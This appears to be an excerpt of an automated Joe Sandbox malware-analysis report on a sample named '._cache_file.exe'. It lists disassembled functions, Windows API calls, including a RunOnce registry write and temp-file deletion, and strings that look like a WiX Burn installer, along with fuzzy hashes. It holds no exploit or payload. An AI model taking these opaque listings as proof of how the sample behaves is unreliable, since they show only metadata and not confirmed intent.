Instruction ID: 53ddb7607095479e294194b47731dd8be6b00f51872c2d7ffa9a956b4b8d40d8
Opcode Fuzzy Hash: 8c752f50bff50f85c4aeb9d980662a7379bd448b5bc8eb159723ff54f28850d4
Instruction Fuzzy Hash: 6EF031B1A00225AFE7109F59980595BFBECFF05750B01422AFD05D7350D771AD10C7E0

Function 008030BF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 008030D4
SysFreeString.OLEAUT32(00000000), ref: 00803104

Strings

xmlutil.cpp, xrefs: 008030E8

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: String$AllocFree
String ID: xmlutil.cpp
API String ID: 344208780-1270936966
Opcode ID: 5103ff19243b80f52b20527c677a4e09c92184c111b6f440c231eaf2b1af0aad
Instruction ID: b6152819268c9842b778597726f39969374784663aa127c4db73535ff5d85a3f
Opcode Fuzzy Hash: 5103ff19243b80f52b20527c677a4e09c92184c111b6f440c231eaf2b1af0aad
Instruction Fuzzy Hash: 40F0E931201658EBC7315F449C09F6B7BA9FF44B60F254028FC04D7350C7758E109AE0

Function 0080336E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 00803383
SysFreeString.OLEAUT32(00000000), ref: 008033B3

Strings

xmlutil.cpp, xrefs: 0080339A

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: String$AllocFree
String ID: xmlutil.cpp
API String ID: 344208780-1270936966
Opcode ID: 4bb7020beb727d1c74d2cc0b9b1ea050e204c4b16012831af8dc3b4c4b6f5b57
Instruction ID: cc6a09ca373616a777bdb01dc3f09398c7972c330e421fbfedcc014ba51ee999
Opcode Fuzzy Hash: 4bb7020beb727d1c74d2cc0b9b1ea050e204c4b16012831af8dc3b4c4b6f5b57
Instruction Fuzzy Hash: 5AF05435240118E7C7615F49AC48FAB77ACFB85760F264119FD05D7350DB78DE509AE0

Function 00801344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29registryCOMMON

Download Yara Rule

APIs

RegSetValueExW.ADVAPI32(?,?,00000000,00000004,?,00000004,SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce,?,007CF11A,00000005,Resume,?,?,?,00000002,00000000), ref: 00801359

Strings

SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00801347
regutil.cpp, xrefs: 00801381

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: Value
String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce$regutil.cpp
API String ID: 3702945584-2416625845
Opcode ID: 881969c2a29c2e353fbec48f1a8c8f061e4f6f9cbc467f83594bb5eccf149e29
Instruction ID: dfe9e2ff8efeefde9db9b9968e9a3b98ce153475385e9932348bacbfb032b2c4
Opcode Fuzzy Hash: 881969c2a29c2e353fbec48f1a8c8f061e4f6f9cbc467f83594bb5eccf149e29
Instruction Fuzzy Hash: 25E06D72B413357BEB306AA64C09F977A8CEF04BA0F424025BE08EA590D2658D1082E4

Function 00800CD1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(RegDeleteKeyExW,AdvApi32.dll), ref: 00800CF2

Strings

RegDeleteKeyExW, xrefs: 00800CE7
AdvApi32.dll, xrefs: 00800CD7

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: AddressProc
String ID: AdvApi32.dll$RegDeleteKeyExW
API String ID: 190572456-850864035
Opcode ID: 39085d4e9056a4c6c09afdf67a1ec46adeeb1eb2a20c19a3cfbafd4fb219d33a
Instruction ID: f1468e41638fde0145c8c7859124769b4fcaa8ab7dc46456aa54c5f8e418b8f3
Opcode Fuzzy Hash: 39085d4e9056a4c6c09afdf67a1ec46adeeb1eb2a20c19a3cfbafd4fb219d33a
Instruction Fuzzy Hash: FAE08CB0707A20ABC7749F24BC0AA453BA0FB38B15700822DE802D33B1DB785842CBA0

Analysis Process: ._cache_file.exePID: 5272, Parent PID: 3960COMMON

Executed Functions

Function 00E43BC3 Relevance: 47.6, APIs: 23, Strings: 4, Instructions: 311
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesW.KERNELBASE(?,?,?,?,00000000,?,?), ref: 00E43C3F
GetLastError.KERNEL32(?,?,?,00000000,?,?), ref: 00E43C52
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,00000000,?,?), ref: 00E43C9D
GetLastError.KERNEL32(?,?,?,00000000,?,?), ref: 00E43CA7
GetTempPathW.KERNEL32(00000104,?,?,?,?,00000000,?,?), ref: 00E43CF5
GetLastError.KERNEL32(?,?,?,00000000,?,?), ref: 00E43CFF
FindFirstFileW.KERNEL32(?,?,?,*.*,?,?,?,?,00000000,?,?), ref: 00E43D52
GetLastError.KERNEL32(?,?,?,00000000,?,?), ref: 00E43D63
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,00000000,?,?), ref: 00E43E3D
DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00000000,?,?), ref: 00E43E51
GetTempFileNameW.KERNEL32(?,DEL,00000000,?,?,?,?,00000000,?,?), ref: 00E43E78
MoveFileExW.KERNEL32(?,?,00000001,?,?,?,00000000,?,?), ref: 00E43E9B
MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,00000000,?,?), ref: 00E43EB4
FindNextFileW.KERNEL32(000000FF,?,?,?,?,?,?,?,00000000,?,?), ref: 00E43EC4
GetLastError.KERNEL32(?,?,?,00000000,?,?), ref: 00E43ED9
GetLastError.KERNEL32(?,?,?,00000000,?,?), ref: 00E43F08
GetLastError.KERNEL32(?,?,?,00000000,?,?), ref: 00E43F2A
GetLastError.KERNEL32(?,?,?,00000000,?,?), ref: 00E43F4C
RemoveDirectoryW.KERNEL32(?,?,?,?,00000000,?,?), ref: 00E43F63
GetLastError.KERNEL32(?,?,?,00000000,?,?), ref: 00E43F6D
MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,00000000,?,?), ref: 00E43F93
GetLastError.KERNEL32(?,?,?,00000000,?,?), ref: 00E43FAE
FindClose.KERNEL32(000000FF,?,?,?,00000000,?,?), ref: 00E43FE4

Strings

*.*, xrefs: 00E43D2B
DEL, xrefs: 00E43E6C
4#v, xrefs: 00E43CF5
dirutil.cpp, xrefs: 00E43C75, 00E43EF9

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: ErrorFileLast$AttributesFindMove$Temp$CloseDeleteDirectoryFirstNameNextPathRemove
String ID: 4#v$*.*$DEL$dirutil.cpp
API String ID: 1544372074-4118715877
Opcode ID: af69f0cf5b68d9ffde43da44677cb11c19461ecb1de5bba2b93eaec754544e98
Instruction ID: bb23636cc2eff80f010cdb47d4a40487458d1e80b0511af77f04a6c44aba8773
Opcode Fuzzy Hash: af69f0cf5b68d9ffde43da44677cb11c19461ecb1de5bba2b93eaec754544e98
Instruction Fuzzy Hash: A1B1DC72E01335AEEB309A759C45BEAB6F9EF44754F0112A5ED09F7190D7328E84CBA0

Function 00E569CC Relevance: 33.6, APIs: 6, Strings: 13, Instructions: 358
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E4D39D: EnterCriticalSection.KERNEL32(?,?,00000000,?,?,00E6B2BB,?,00000000,?,00E6967A,00000000,00000000,00000001,00000000,00000001,?), ref: 00E4D3AC
Part of subcall function 00E4D39D: InterlockedCompareExchange.KERNEL32(00000028,00000001,00000000), ref: 00E4D3BB
Part of subcall function 00E4D39D: LeaveCriticalSection.KERNEL32(?,?,00E6B2BB,?,00000000,?,00E6967A,00000000,00000000,00000001,00000000,00000001,?,?,?,?), ref: 00E4D3D0

ReleaseMutex.KERNEL32(00000000,?,00000000,?,00000000,00000001,00000000), ref: 00E56D9A
CloseHandle.KERNEL32(00000000), ref: 00E56DA3
CloseHandle.KERNEL32(@G,?,00000000,?,00000000,00000001,00000000), ref: 00E56DC0

Strings

user cannot start apply because it is busy with another action., xrefs: 00E56A2F
@G, xrefs: 00E56CBC, 00E56C0B, 00E56AB3, 00E56CDB, 00E56CF5, 00E56DBF
Failed to register bundle., xrefs: 00E56C00
Another per-machine setup is already executing., xrefs: 00E56BD9
Failed to elevate., xrefs: 00E56BA5
Another per-user setup is already executing., xrefs: 00E56AF1
UX aborted apply begin., xrefs: 00E56AA6
Failed to cache user to working directory., xrefs: 00E56B7F
Failed while caching, aborting execution., xrefs: 00E56CA8
Failed to set initial apply variables., xrefs: 00E56B18
Failed to create cache thread., xrefs: 00E56C80
crypt32.dll, xrefs: 00E56CD2
core.cpp, xrefs: 00E56A9C, 00E56C76

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: CloseCriticalHandleSection$CompareEnterExchangeInterlockedLeaveMutexRelease
String ID: @G$Another per-machine setup is already executing.$Another per-user setup is already executing.$user cannot start apply because it is busy with another action.$Failed to cache user to working directory.$Failed to create cache thread.$Failed to elevate.$Failed to register bundle.$Failed to set initial apply variables.$Failed while caching, aborting execution.$UX aborted apply begin.$core.cpp$crypt32.dll
API String ID: 322611130-4241947905
Opcode ID: 470bc6831fb79ee747097db6cc8fc862d1a720ace673a96c98bff4a62ece1ca7
Instruction ID: 91096dd2b24f6ca143de34ec0b5ccc0fc216bc34cd92f48579ab076e3292b1c5
Opcode Fuzzy Hash: 470bc6831fb79ee747097db6cc8fc862d1a720ace673a96c98bff4a62ece1ca7
Instruction Fuzzy Hash: 09C1D671A01616BFDF199BA0C845BEEB7B8FF04306F406A2AF915F7151DB306958CB90

Function 00E41070 Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 77fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00E433D7: GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,00000000,00000000,?,00E6AD27,00000001,00000000,?,WixBundleSourceProcessPath,00000001,?), ref: 00E433F8

CreateFileW.KERNELBASE(?,80000000,00000005,00000000,00000003,00000080,00000000,?,00000000), ref: 00E410F6

Part of subcall function 00E41174: HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00E4111A,cabinet.dll,00000009,?,?,00000000), ref: 00E41185
Part of subcall function 00E41174: GetModuleHandleW.KERNEL32(kernel32,?,?,?,?,00E4111A,cabinet.dll,00000009,?,?,00000000), ref: 00E41190
Part of subcall function 00E41174: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00E4119E
Part of subcall function 00E41174: GetLastError.KERNEL32(?,?,?,?,00E4111A,cabinet.dll,00000009,?,?,00000000), ref: 00E411B9
Part of subcall function 00E41174: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00E411C1
Part of subcall function 00E41174: GetLastError.KERNEL32(?,?,?,?,00E4111A,cabinet.dll,00000009,?,?,00000000), ref: 00E411D6

CloseHandle.KERNEL32(?,?,?,?,00E8B4C0,?,cabinet.dll,00000009,?,?,00000000), ref: 00E41131

Strings

wininet.dll, xrefs: 00E410AE
clbcatq.dll, xrefs: 00E410BC
comres.dll, xrefs: 00E410B5
crypt32.dll, xrefs: 00E410CA
msasn1.dll, xrefs: 00E410C3
feclient.dll, xrefs: 00E410D1
msi.dll, xrefs: 00E410A0
cabinet.dll, xrefs: 00E41099
version.dll, xrefs: 00E410A7

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: AddressErrorFileHandleLastModuleProc$CloseCreateHeapInformationName
String ID: cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$feclient.dll$msasn1.dll$msi.dll$version.dll$wininet.dll
API String ID: 3687706282-3151496603
Opcode ID: aaedca3fbc7b5448c754e4f95b5502c69321be6acd4b4279d8536dcf7dc19f70
Instruction ID: 966e43e18f0e8e9e497982a482c1d349cb94716a0a9227f1cc5fbf2e34e6cca2
Opcode Fuzzy Hash: aaedca3fbc7b5448c754e4f95b5502c69321be6acd4b4279d8536dcf7dc19f70
Instruction Fuzzy Hash: C521747190021CABDB10AFA5DC46BEFBBF8EF45314F505159E928B7292E7705948CBA0

Function 00E5993E Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,?,?,?,*.*,?,?,?,00000000,.unverified,?), ref: 00E599ED
lstrlenW.KERNEL32(?), ref: 00E59A14
FindNextFileW.KERNELBASE(00000000,00000010), ref: 00E59A74
FindClose.KERNEL32(00000000), ref: 00E59A7F

Part of subcall function 00E43BC3: GetFileAttributesW.KERNELBASE(?,?,?,?,00000000,?,?), ref: 00E43C3F
Part of subcall function 00E43BC3: GetLastError.KERNEL32(?,?,?,00000000,?,?), ref: 00E43C52

Strings

*.*, xrefs: 00E599C7
.unverified, xrefs: 00E59981

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: FileFind$AttributesCloseErrorFirstLastNextlstrlen
String ID: *.*$.unverified
API String ID: 457978746-2528915496
Opcode ID: 25b6b05da242ad3a1c6894005bae76133bf2eae8735b9cd7075171052843f7bb
Instruction ID: 9adcc81d84f1391d01005541407b4a5125fcb44807dec1e1edb8bfa17bf00fc7
Opcode Fuzzy Hash: 25b6b05da242ad3a1c6894005bae76133bf2eae8735b9cd7075171052843f7bb
Instruction Fuzzy Hash: 1441823190066CEEDF20AB60DC49BEA77B8EF44306F5015A5E90DB50A2EB758EC8CF54

Function 00E84315 Relevance: 3.0, APIs: 2, Instructions: 44fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,?,00000000,00000000,?), ref: 00E84350
FindClose.KERNEL32(00000000), ref: 00E8435C

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 09dfd3233186f7b9c46c39eaf46b11ccbe9638030c95bf904472c81fd4bad238
Instruction ID: 531b84f76c50488f3282308e7322860599f7f88cc8fda76880bcf4ae4e41cb2a
Opcode Fuzzy Hash: 09dfd3233186f7b9c46c39eaf46b11ccbe9638030c95bf904472c81fd4bad238
Instruction Fuzzy Hash: 0701D671A00209ABDB10EFAAED8D9ABB7ACEBC5315F400165E91CE7280D7305E4D8790

Function 00E4F86E Relevance: 117.7, APIs: 3, Strings: 64, Instructions: 445
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

yes, xrefs: 00E4FBC0
Failed to set registration paths., xrefs: 00E4FD92
=S, xrefs: 00E4F86E
Failed to select registration node., xrefs: 00E4F8A6
Failed to select Update node., xrefs: 00E4FCC6
Failed to parse software tag., xrefs: 00E4FC9A
Registration, xrefs: 00E4F888
ProductFamily, xrefs: 00E4FD26
Failed to get @DisplayVersion., xrefs: 00E4FA44
Contact, xrefs: 00E4FB5B
ParentDisplayName, xrefs: 00E4FB0B
Failed to get @Register., xrefs: 00E4F9FA
Failed to get @Contact., xrefs: 00E4FB72
Failed to get @Department., xrefs: 00E4FD18
DisableRemove, xrefs: 00E4FC53
ProviderKey, xrefs: 00E4F95D
Failed to get @ProductFamily., xrefs: 00E4FD3D
Failed to get @HelpTelephone., xrefs: 00E4FAB3
Arp, xrefs: 00E4F9BD
Failed to get @Name., xrefs: 00E4FD5E
Failed to get @ParentDisplayName., xrefs: 00E4FB22
Failed to get @PerMachine., xrefs: 00E4F9AF
Failed to get @DisableModify., xrefs: 00E4FC42
Name, xrefs: 00E4FD4B
Failed to get @DisableRemove., xrefs: 00E4FC6A
Classification, xrefs: 00E4FD6C
Failed to parse related bundles, xrefs: 00E4F90D
Failed to get @ExecutableName., xrefs: 00E4F991
DisableModify, xrefs: 00E4FB80
PerMachine, xrefs: 00E4F99C
Failed to get @Publisher., xrefs: 00E4FA69
Version, xrefs: 00E4F91B
Failed to parse @Version: %ls, xrefs: 00E4F94F
AboutUrl, xrefs: 00E4FAC1
msasn1.dll, xrefs: 00E4F8BF
Register, xrefs: 00E4F9E7
registration.cpp, xrefs: 00E4FC11
Failed to get @Comments., xrefs: 00E4FB4A
UpdateUrl, xrefs: 00E4FAE6
Failed to get @Version., xrefs: 00E4F92E
Failed to get @Tag., xrefs: 00E4F8F4
clbcatq.dll, xrefs: 00E4F8E0
button, xrefs: 00E4FB9F
Failed to get @AboutUrl., xrefs: 00E4FAD8
ExecutableName, xrefs: 00E4F97E
Failed to get @DisplayName., xrefs: 00E4FA1F
Invalid modify disabled type: %ls, xrefs: 00E4FC1E
HelpTelephone, xrefs: 00E4FA9C
Failed to get @UpdateUrl., xrefs: 00E4FAFD
Failed to get @Manufacturer., xrefs: 00E4FCF0
Manufacturer, xrefs: 00E4FCDD
Tag, xrefs: 00E4F8E1
Comments, xrefs: 00E4FB33
DisplayVersion, xrefs: 00E4FA2D
Failed to get @ProviderKey., xrefs: 00E4F970
Department, xrefs: 00E4FD01
Failed to get @Id., xrefs: 00E4F8D3
Failed to select ARP node., xrefs: 00E4F9D9
Update, xrefs: 00E4FCA8
Publisher, xrefs: 00E4FA52
Failed to get @HelpLink., xrefs: 00E4FA8E
DisplayName, xrefs: 00E4FA08
HelpLink, xrefs: 00E4FA77
Failed to get @Classification., xrefs: 00E4FD7F

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID:
String ID: =S$AboutUrl$Arp$Classification$Comments$Contact$Department$DisableModify$DisableRemove$DisplayName$DisplayVersion$ExecutableName$Failed to get @AboutUrl.$Failed to get @Classification.$Failed to get @Comments.$Failed to get @Contact.$Failed to get @Department.$Failed to get @DisableModify.$Failed to get @DisableRemove.$Failed to get @DisplayName.$Failed to get @DisplayVersion.$Failed to get @ExecutableName.$Failed to get @HelpLink.$Failed to get @HelpTelephone.$Failed to get @Id.$Failed to get @Manufacturer.$Failed to get @Name.$Failed to get @ParentDisplayName.$Failed to get @PerMachine.$Failed to get @ProductFamily.$Failed to get @ProviderKey.$Failed to get @Publisher.$Failed to get @Register.$Failed to get @Tag.$Failed to get @UpdateUrl.$Failed to get @Version.$Failed to parse @Version: %ls$Failed to parse related bundles$Failed to parse software tag.$Failed to select ARP node.$Failed to select Update node.$Failed to select registration node.$Failed to set registration paths.$HelpLink$HelpTelephone$Invalid modify disabled type: %ls$Manufacturer$Name$ParentDisplayName$PerMachine$ProductFamily$ProviderKey$Publisher$Register$Registration$Tag$Update$UpdateUrl$Version$button$clbcatq.dll$msasn1.dll$registration.cpp$yes
API String ID: 0-3241591529
Opcode ID: cfc8bf52e8e0c70bb39a84956735ccff5ead2eb4f2623d762490d316b9c17579
Instruction ID: fb1c580f743f35ddc92c29394866b706e8dbc43fef7c21167fb9cbdb6e6c443a
Opcode Fuzzy Hash: cfc8bf52e8e0c70bb39a84956735ccff5ead2eb4f2623d762490d316b9c17579
Instruction Fuzzy Hash: 7FE1A632E41776BFCF26A6A0DC42FEDBAA4AB04F14F1122B5FD18B7690D7619D409780

Function 00E4B389 Relevance: 93.3, APIs: 24, Strings: 29, Instructions: 565
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,?,00000000,7736C3F0,00000000), ref: 00E4B3FF
SetFilePointerEx.KERNELBASE(000000FF,00000000,00000000,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 00E4B44C
GetLastError.KERNEL32(?,?,?,00000000,7736C3F0,00000000), ref: 00E4B452
ReadFile.KERNELBASE(00000000,\C,00000040,?,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 00E4B49A
GetLastError.KERNEL32(?,?,?,00000000,7736C3F0,00000000), ref: 00E4B4A0
SetFilePointerEx.KERNELBASE(00000000,00000000,?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 00E4B4FD
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 00E4B503
ReadFile.KERNELBASE(00000000,?,00000018,00000040,00000000,?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 00E4B54C
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 00E4B552
SetFilePointerEx.KERNELBASE(00000000,-00000098,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 00E4B5C3
GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 00E4B5C9

Strings

Failed to find valid NT image header in buffer., xrefs: 00E4BACC
Failed to read complete section info., xrefs: 00E4B8C1
Failed to find Burn section., xrefs: 00E4BA2E
burn, xrefs: 00E4B734
Failed to read section info, data to short: %u, xrefs: 00E4B7A6
.wix, xrefs: 00E4B72C
Failed to allocate memory for container sizes., xrefs: 00E4B9CF
Failed to read NT header., xrefs: 00E4B57D
(, xrefs: 00E4B719
Failed to seek to start of file., xrefs: 00E4B47D
Failed to seek to NT header., xrefs: 00E4B52E
Failed to allocate buffer for section info., xrefs: 00E4B7E0
Failed to read section info., xrefs: 00E4B895
section.cpp, xrefs: 00E4B420, 00E4B473, 00E4B4C1, 00E4B524, 00E4B573, 00E4B5EA, 00E4B639, 00E4B688, 00E4B6DD, 00E4B794, 00E4B7D4, 00E4B826, 00E4B88B, 00E4B8B5, 00E4B8DC, 00E4B9C3, 00E4BA03, 00E4BA22, 00E4BA5F, 00E4BA9D, 00E4BAC0, 00E4BADB
Failed to read signature size., xrefs: 00E4B692
Failed to find valid DOS image header in buffer., xrefs: 00E4BAE7
Failed to seek to section info., xrefs: 00E4B5F4, 00E4B830
Failed to read image section header, index: %u, xrefs: 00E4BAA8
\C, xrefs: 00E4B3A0, 00E4B494, 00E4B4E7, 00E4B3AD, 00E4B497
Failed to read signature offset., xrefs: 00E4B643
4, xrefs: 00E4B780
Failed to seek past optional headers., xrefs: 00E4B6E7
Failed to get total size of bundle., xrefs: 00E4B91F
PE Header from file didn't match PE Header in memory., xrefs: 00E4BA0D
Failed to open handle to user process path., xrefs: 00E4B42A
Failed to read complete image section header, index: %u, xrefs: 00E4BA71
PE, xrefs: 00E4B594
Failed to read DOS header., xrefs: 00E4B4CB
Failed to read section info, unsupported version: %08x, xrefs: 00E4B8F1

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: ErrorLast$File$Pointer$Read
String ID: ($.wix$4$Failed to allocate buffer for section info.$Failed to allocate memory for container sizes.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get total size of bundle.$Failed to open handle to user process path.$Failed to read DOS header.$Failed to read NT header.$Failed to read complete image section header, index: %u$Failed to read complete section info.$Failed to read image section header, index: %u$Failed to read section info, data to short: %u$Failed to read section info, unsupported version: %08x$Failed to read section info.$Failed to read signature offset.$Failed to read signature size.$Failed to seek past optional headers.$Failed to seek to NT header.$Failed to seek to section info.$Failed to seek to start of file.$PE$PE Header from file didn't match PE Header in memory.$\C$burn$section.cpp
API String ID: 2600052162-3965351844
Opcode ID: 6eeb2b1a35f8b864d6822c3120aaea90d3378501925ecadf7729015ea6a2ee23
Instruction ID: ff261b076f75a4f51c201ccc619e769e129455a9fdb236af3cda0c15a1d46c36
